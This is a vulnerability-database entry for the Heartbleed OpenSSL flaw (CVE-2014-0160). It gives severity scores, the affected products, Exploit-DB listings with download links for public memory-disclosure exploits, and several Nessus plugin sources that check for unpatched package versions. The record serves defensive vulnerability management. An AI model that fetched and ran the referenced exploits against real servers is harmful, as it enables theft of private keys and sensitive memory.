CVE-2014-0160 - Out-of-bounds Read vulnerability in multiple products

CVSS 7.5 - HIGH
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: NONE
Availability impact: NONE

Summary

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

Vulnerable Configurations

Part         Description        Count
Application  Openssl            11
Application  Filezilla-Project  21
Application  Siemens            2
Application  Mitel              11
Application  Redhat             3
Application  Broadcom           2
Application  Splunk             3
OS           Siemens            4
OS           Intellian          5
OS           Opensuse           2
OS           Canonical          3
OS           Fedoraproject      2
OS           Redhat             6
OS           Debian             3
OS           Ricon              1
Hardware     Siemens            4
Hardware     Intellian          2
Hardware     Ricon              1

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Overread Buffers
    An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.

Exploit-Db

  • description: OpenSSL TLS Heartbeat Extension - Memory Disclosure. CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform
    file: exploits/multiple/remote/32745.py
    id: EDB-ID:32745
    last seen: 2016-02-03
    modified: 2014-04-08
    platform: multiple
    port: 443
    published: 2014-04-08
    reporter: Jared Stafford
    source: https://www.exploit-db.com/download/32745/
    title: OpenSSL TLS Heartbeat Extension - Memory Disclosure
    type: remote
  • description: OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions). CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform
    file: exploits/multiple/remote/32764.py
    id: EDB-ID:32764
    last seen: 2016-02-03
    modified: 2014-04-09
    platform: multiple
    port: 443
    published: 2014-04-09
    reporter: Fitzl Csaba
    source: https://www.exploit-db.com/download/32764/
    title: OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure Multiple SSL/TLS versions
    type: remote
  • description: Heartbleed OpenSSL - Information Leak Exploit (1). CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform
    id: EDB-ID:32791
    last seen: 2016-02-03
    modified: 2014-04-10
    published: 2014-04-10
    reporter: prdelka
    source: https://www.exploit-db.com/download/32791/
    title: Heartbleed OpenSSL - Information Leak Exploit 1
  • description: Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support. CVE-2014-0160,CVE-2014-0346. Remote exploits for multiple platform
    id: EDB-ID:32998
    last seen: 2016-02-03
    modified: 2014-04-24
    published: 2014-04-24
    reporter: Ayman Sagy
    source: https://www.exploit-db.com/download/32998/
    title: Heartbleed OpenSSL - Information Leak Exploit 2 - DTLS Support

Metasploit

Nessus

  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2014-0416.NASL
    description: Updated rhevm-spice-client packages that fix multiple security issues are now available for Red Hat Enterprise Virtualization Manager 3. The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Red Hat Enterprise Virtualization Manager provides access to virtual machines using SPICE. These SPICE client packages provide the SPICE client and usbclerk service for both Windows 32-bit operating systems and Windows 64-bit operating systems. The rhevm-spice-client package includes the mingw-virt-viewer Windows SPICE client. OpenSSL, a general purpose cryptography library with a TLS implementation, is bundled with mingw-virt-viewer. The mingw-virt-viewer package has been updated to correct the following issues : An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2013-0169) A NULL pointer dereference flaw was found in the way OpenSSL handled TLS/SSL protocol handshake packets. A specially crafted handshake packet could cause a TLS/SSL client using OpenSSL to crash. (CVE-2013-4353) It was discovered that the TLS/SSL protocol could leak information about plain text when optional compression was used. An attacker able to control part of the plain text sent over an encrypted TLS/SSL connection could possibly use this flaw to recover other portions of the plain text. (CVE-2012-4929) Red Hat would like to thank the OpenSSL project for reporting CVE-2014-0160. Upstream acknowledges Neel Mehta of Google Security as the original reporter. The updated mingw-virt-viewer Windows SPICE client further includes OpenSSL security fixes that have no security impact on mingw-virt-viewer itself. The security fixes included in this update address the following CVE numbers : CVE-2013-6449, CVE-2013-6450, CVE-2012-2686, and CVE-2013-0166 All Red Hat Enterprise Virtualization Manager users are advised to upgrade to these updated packages, which address these issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 79013
    published: 2014-11-08
    reporter: This script is Copyright (C) 2014-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/79013
    title: RHEL 6 : rhevm-spice-client (RHSA-2014:0416)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2014:0416. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(79013);
      script_version("1.9");
      script_cvs_date("Date: 2019/10/24 15:35:38");
    
      script_cve_id("CVE-2012-2686", "CVE-2012-4929", "CVE-2013-0166", "CVE-2013-0169", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160");
      script_bugtraq_id(55704, 57755, 57778, 60268, 64530, 64618, 64691, 66690);
      script_xref(name:"RHSA", value:"2014:0416");
    
      script_name(english:"RHEL 6 : rhevm-spice-client (RHSA-2014:0416)");
      script_summary(english:"Checks the rpm output for the updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Updated rhevm-spice-client packages that fix multiple security issues
    are now available for Red Hat Enterprise Virtualization Manager 3.
    
    The Red Hat Security Response Team has rated this update as having
    Important security impact. Common Vulnerability Scoring System (CVSS)
    base scores, which give detailed severity ratings, are available for
    each vulnerability from the CVE links in the References section.
    
    Red Hat Enterprise Virtualization Manager provides access to virtual
    machines using SPICE. These SPICE client packages provide the SPICE
    client and usbclerk service for both Windows 32-bit operating systems
    and Windows 64-bit operating systems.
    
    The rhevm-spice-client package includes the mingw-virt-viewer Windows
    SPICE client. OpenSSL, a general purpose cryptography library with a
    TLS implementation, is bundled with mingw-virt-viewer. The
    mingw-virt-viewer package has been updated to correct the following
    issues :
    
    An information disclosure flaw was found in the way OpenSSL handled
    TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS
    client or server could send a specially crafted TLS or DTLS Heartbeat
    packet to disclose a limited portion of memory per request from a
    connected client or server. Note that the disclosed portions of memory
    could potentially include sensitive information such as private keys.
    (CVE-2014-0160)
    
    It was discovered that OpenSSL leaked timing information when
    decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode
    cipher suites were used. A remote attacker could possibly use this
    flaw to retrieve plain text from the encrypted packets by using a
    TLS/SSL or DTLS server as a padding oracle. (CVE-2013-0169)
    
    A NULL pointer dereference flaw was found in the way OpenSSL handled
    TLS/SSL protocol handshake packets. A specially crafted handshake
    packet could cause a TLS/SSL client using OpenSSL to crash.
    (CVE-2013-4353)
    
    It was discovered that the TLS/SSL protocol could leak information
    about plain text when optional compression was used. An attacker able
    to control part of the plain text sent over an encrypted TLS/SSL
    connection could possibly use this flaw to recover other portions of
    the plain text. (CVE-2012-4929)
    
    Red Hat would like to thank the OpenSSL project for reporting
    CVE-2014-0160. Upstream acknowledges Neel Mehta of Google Security as
    the original reporter.
    
    The updated mingw-virt-viewer Windows SPICE client further includes
    OpenSSL security fixes that have no security impact on
    mingw-virt-viewer itself. The security fixes included in this update
    address the following CVE numbers :
    
    CVE-2013-6449, CVE-2013-6450, CVE-2012-2686, and CVE-2013-0166
    
    All Red Hat Enterprise Virtualization Manager users are advised to
    upgrade to these updated packages, which address these issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://rhn.redhat.com/errata/RHSA-2014-0416.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.redhat.com/security/data/cve/CVE-2013-0169.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.redhat.com/security/data/cve/CVE-2012-4929.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.redhat.com/security/data/cve/CVE-2013-4353.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.redhat.com/security/data/cve/CVE-2014-0160.html"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x64-cab");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x64-msi");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x86-cab");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhevm-spice-client-x86-msi");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2012/09/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/04/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/11/08");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2014-2019 Tenable Network Security, Inc.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = eregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! ereg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    
    flag = 0;
    if (rpm_exists(rpm:"rhevm-spice-client-x64-cab-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x64-cab-3.3-12.el6_5")) flag++;
    if (rpm_exists(rpm:"rhevm-spice-client-x64-msi-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x64-msi-3.3-12.el6_5")) flag++;
    if (rpm_exists(rpm:"rhevm-spice-client-x86-cab-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x86-cab-3.3-12.el6_5")) flag++;
    if (rpm_exists(rpm:"rhevm-spice-client-x86-msi-3\.3-", release:"RHEL6") && rpm_check(release:"RHEL6", reference:"rhevm-spice-client-x86-msi-3.3-12.el6_5")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "rhevm-spice-client-x64-cab-3.3 / rhevm-spice-client-x64-msi-3.3 / etc");
    }
    
  • NASL family: OracleVM Local Security Checks
    NASL id: ORACLEVM_OVMSA-2014-0032.NASL
    description: The remote OracleVM system is missing necessary patches to address critical security updates : - fix CVE-2014-3567 - memory leak when handling session tickets - fix CVE-2014-3513 - memory leak in srtp support - add support for fallback SCSV to partially mitigate (CVE-2014-3566) (padding attack on SSL3) - add ECC TLS extensions to DTLS (#1119800) - fix CVE-2014-3505 - doublefree in DTLS packet processing - fix CVE-2014-3506 - avoid memory exhaustion in DTLS - fix CVE-2014-3507 - avoid memory leak in DTLS - fix CVE-2014-3508 - fix OID handling to avoid information leak - fix CVE-2014-3509 - fix race condition when parsing server hello - fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS - fix CVE-2014-3511 - disallow protocol downgrade via fragmentation - fix CVE-2014-0224 fix that broke EAP-FAST session resumption support - drop EXPORT, RC2, and DES from the default cipher list (#1057520) - print ephemeral key size negotiated in TLS handshake (#1057715) - do not include ECC ciphersuites in SSLv2 client hello (#1090952) - properly detect encryption failure in BIO (#1100819) - fail on hmac integrity check if the .hmac file is empty (#1105567) - FIPS mode: make the limitations on DSA, DH, and RSA keygen length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment variable is set - fix CVE-2010-5298 - possible use of memory after free - fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment - fix CVE-2014-0198 - possible NULL pointer dereference - fix CVE-2014-0221 - DoS from invalid DTLS handshake packet - fix CVE-2014-0224 - SSL/TLS MITM vulnerability - fix CVE-2014-3470 - client-side DoS when using anonymous ECDH - add back support for secp521r1 EC curve - fix CVE-2014-0160 - information disclosure in TLS heartbeat extension - use 2048 bit RSA key in FIPS selftests - add DH_compute_key_padded needed for FIPS CAVS testing - make 3des strength to be 128 bits instead of 168 (#1056616) - FIPS mode: do not generate DSA keys and DH parameters < 2048 bits - FIPS mode: use approved RSA keygen (allows only 2048 and 3072 bit keys) - FIPS mode: add DH selftest - FIPS mode: reseed DRBG properly on RAND_add - FIPS mode: add RSA encrypt/decrypt selftest - FIPS mode: add hard limit for 2^32 GCM block encryptions with the same key - use the key length from configuration file if req -newkey rsa is invoked - fix CVE-2013-4353 - Invalid TLS handshake crash - fix CVE-2013-6450 - possible MiTM attack on DTLS1 - fix CVE-2013-6449 - crash when version in SSL structure is incorrect - add back some no-op symbols that were inadvertently dropped
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 79547
    published: 2014-11-26
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/79547
    title: OracleVM 3.3 : openssl (OVMSA-2014-0032) (Heartbleed) (POODLE)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    # The package checks in this plugin were extracted from OracleVM
    # Security Advisory OVMSA-2014-0032.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(79547);
      script_version("1.21");
      script_cvs_date("Date: 2019/11/12");
    
      script_cve_id("CVE-2010-5298", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160", "CVE-2014-0195", "CVE-2014-0198", "CVE-2014-0221", "CVE-2014-0224", "CVE-2014-3470", "CVE-2014-3505", "CVE-2014-3506", "CVE-2014-3507", "CVE-2014-3508", "CVE-2014-3509", "CVE-2014-3510", "CVE-2014-3511", "CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567");
      script_bugtraq_id(64530, 64618, 64691, 66690, 66801, 67193, 67898, 67899, 67900, 67901, 69075, 69076, 69078, 69079, 69081, 69082, 69084, 70574, 70584, 70586);
    
      script_name(english:"OracleVM 3.3 : openssl (OVMSA-2014-0032) (Heartbleed) (POODLE)");
      script_summary(english:"Checks the RPM output for the updated package.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote OracleVM host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The remote OracleVM system is missing necessary patches to address
    critical security updates :
    
      - fix CVE-2014-3567 - memory leak when handling session
        tickets
    
      - fix CVE-2014-3513 - memory leak in srtp support
    
      - add support for fallback SCSV to partially mitigate
        (CVE-2014-3566) (padding attack on SSL3)
    
      - add ECC TLS extensions to DTLS (#1119800)
    
      - fix CVE-2014-3505 - doublefree in DTLS packet processing
    
      - fix CVE-2014-3506 - avoid memory exhaustion in DTLS
    
      - fix CVE-2014-3507 - avoid memory leak in DTLS
    
      - fix CVE-2014-3508 - fix OID handling to avoid
        information leak
    
      - fix CVE-2014-3509 - fix race condition when parsing
        server hello
    
      - fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling
        in DTLS
    
      - fix CVE-2014-3511 - disallow protocol downgrade via
        fragmentation
    
      - fix CVE-2014-0224 fix that broke EAP-FAST session
        resumption support
    
      - drop EXPORT, RC2, and DES from the default cipher list
        (#1057520)
    
      - print ephemeral key size negotiated in TLS handshake
        (#1057715)
    
      - do not include ECC ciphersuites in SSLv2 client hello
        (#1090952)
    
      - properly detect encryption failure in BIO (#1100819)
    
      - fail on hmac integrity check if the .hmac file is empty
        (#1105567)
    
      - FIPS mode: make the limitations on DSA, DH, and RSA
        keygen length enforced only if
        OPENSSL_ENFORCE_MODULUS_BITS environment variable is set
    
      - fix CVE-2010-5298 - possible use of memory after free
    
      - fix CVE-2014-0195 - buffer overflow via invalid DTLS
        fragment
    
      - fix CVE-2014-0198 - possible NULL pointer dereference
    
      - fix CVE-2014-0221 - DoS from invalid DTLS handshake
        packet
    
      - fix CVE-2014-0224 - SSL/TLS MITM vulnerability
    
      - fix CVE-2014-3470 - client-side DoS when using anonymous
        ECDH
    
      - add back support for secp521r1 EC curve
    
      - fix CVE-2014-0160 - information disclosure in TLS
        heartbeat extension
    
      - use 2048 bit RSA key in FIPS selftests
    
      - add DH_compute_key_padded needed for FIPS CAVS testing
    
      - make 3des strength to be 128 bits instead of 168
        (#1056616)
    
      - FIPS mode: do not generate DSA keys and DH parameters <
        2048 bits
    
      - FIPS mode: use approved RSA keygen (allows only 2048 and
        3072 bit keys)
    
      - FIPS mode: add DH selftest
    
      - FIPS mode: reseed DRBG properly on RAND_add
    
      - FIPS mode: add RSA encrypt/decrypt selftest
    
      - FIPS mode: add hard limit for 2^32 GCM block encryptions
        with the same key
    
      - use the key length from configuration file if req
        -newkey rsa is invoked
    
      - fix CVE-2013-4353 - Invalid TLS handshake crash
    
      - fix CVE-2013-6450 - possible MiTM attack on DTLS1
    
      - fix CVE-2013-6449 - crash when version in SSL structure
        is incorrect
    
      - add back some no-op symbols that were inadvertently
        dropped"
      );
      # https://oss.oracle.com/pipermail/oraclevm-errata/2014-November/000240.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?e1e2973b"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected openssl package."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssl");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.3");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2013/12/23");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/11/06");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/11/26");
      script_set_attribute(attribute:"in_the_news", value:"true");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"OracleVM Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/OracleVM/release");
    if (isnull(release) || "OVS" >!< release) audit(AUDIT_OS_NOT, "OracleVM");
    if (! preg(pattern:"^OVS" + "3\.3" + "(\.[0-9]|$)", string:release)) audit(AUDIT_OS_NOT, "OracleVM 3.3", "OracleVM " + release);
    if (!get_kb_item("Host/OracleVM/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu);
    if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu);
    
    flag = 0;
    if (rpm_check(release:"OVS3.3", reference:"openssl-1.0.1e-30.el6_6.2")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssl");
    }
    
  • NASL family: SuSE Local Security Checks
    NASL id: HP_VCA_SSRT101531-SLES.NASL
    description: The RPM installation of HP Version Control Agent (VCA) on the remote Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 77023
    published: 2014-08-06
    reporter: This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/77023
    title: HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(77023);
      script_version("1.10");
      script_cvs_date("Date: 2018/07/12 19:01:16");
    
      script_cve_id("CVE-2014-0160");
      script_bugtraq_id(66690);
      script_xref(name:"CERT", value:"720951");
      script_xref(name:"EDB-ID", value:"32745");
      script_xref(name:"EDB-ID", value:"32764");
      script_xref(name:"EDB-ID", value:"32791");
      script_xref(name:"EDB-ID", value:"32998");
      script_xref(name:"HP", value:"emr_na-c04262472");
      script_xref(name:"HP", value:"HPSBMU03020");
      script_xref(name:"HP", value:"SSRT101531");
    
      script_name(english:"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)");
      script_summary(english:"Checks the version of the VCA package.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote host contains software that is affected by an information
    disclosure vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The RPM installation of HP Version Control Agent (VCA) on the remote
    Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore,
    affected by an information disclosure vulnerability.
    
    An out-of-bounds read error, known as the 'Heartbleed Bug', exists
    related to handling TLS heartbeat extensions that could allow an
    attacker to obtain sensitive information such as primary key material,
    secondary key material, and other protected content.");
      script_set_attribute(attribute:"solution", value:"Upgrade to VCA 7.3.2 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d9ffb6dc");
      script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com");
      script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt");
      
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/04/24");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/08/06");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:version_control_agent");
      script_set_attribute(attribute:"in_the_news", value:"true");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"SuSE Local Security Checks");
    
      script_copyright(english:"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list");
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release !~ "^SLES") audit(AUDIT_OS_NOT, "SuSE Linux Enterprise Server");
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    ourarch = get_kb_item("Host/cpu");
    if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
    if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
    
    # These are the only versions on which the software is supported;
    # however, you can install it on later versions. So
    # only check non-supported versions if paranoia is on.
    if (
      report_paranoia < 2 &&
      !ereg(pattern:"SLES(8|9|10|11)($|[^0-9])", string:release)
    ) audit(AUDIT_OS_NOT, "SuSE Linux Enterprise Server 8 / 9 / 10 / 11");
    
    rpms = get_kb_item_or_exit("Host/SuSE/rpm-list");
    if ("hpvca-" >!< rpms) audit(AUDIT_PACKAGE_NOT_INSTALLED, "HP Version Control Agent");
    
    # Get the RPM version
    match = eregmatch(string:rpms, pattern:"(^|\n)hpvca-(\d+\.\d+\.\d+-\d+)");
    if (isnull(match)) audit(AUDIT_VER_FAIL, "HP Version Control Agent");
    
    version = match[2];
    version = ereg_replace(string:version, replace:".", pattern:"-");
    
    fix = "7.3.2.0";
    
    # These specific version lines are affected
    if (
      version =~ "^7\.2\.2\." ||
      version =~ "^7\.3\.[0-1]\."
    )
    {
      if (report_verbosity > 0)
      {
        report =
         '\n  Installed version : ' + version +
         '\n  Fixed version     : ' + fix +
         '\n';
        security_hole(port:0, extra:report);
      }
      else security_hole(0);
    }
    else audit(AUDIT_PACKAGE_NOT_AFFECTED, "HP Version Control Agent");
    
  • NASL family: Windows
    NASL id: WEBSENSE_EMAIL_SECURITY_HEARTBLEED.NASL
    description: The version of Websense Email Security installed on the remote Windows host contains a bundled version of an OpenSSL DLL file. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73758
    published: 2014-04-29
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73758
    title: Websense Email Security Heartbeat Information Disclosure (Heartbleed)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(73758);
      script_version("1.8");
      script_cvs_date("Date: 2019/11/26");
    
      script_cve_id("CVE-2014-0160");
      script_bugtraq_id(66690);
      script_xref(name:"CERT", value:"720951");
      script_xref(name:"EDB-ID", value:"32745");
      script_xref(name:"EDB-ID", value:"32764");
      script_xref(name:"EDB-ID", value:"32791");
      script_xref(name:"EDB-ID", value:"32998");
    
      script_name(english:"Websense Email Security Heartbeat Information Disclosure (Heartbleed)");
      script_summary(english:"Checks version of OpenSSL DLL file.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote host has an email security application installed that is
    affected by an information disclosure vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The version of Websense Email Security installed on the remote Windows
    host contains a bundled version of an OpenSSL DLL file. It is,
    therefore, affected by an information disclosure vulnerability.
    
    An out-of-bounds read error, known as the 'Heartbleed Bug', exists
    related to handling TLS heartbeat extensions that could allow an
    attacker to obtain sensitive information such as primary key material,
    secondary key material, and other protected content.");
      # http://www.websense.com/content/support/library/ni/shared/security-alerts/openssl-vul-2014.pdf
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?60cf5c8e");
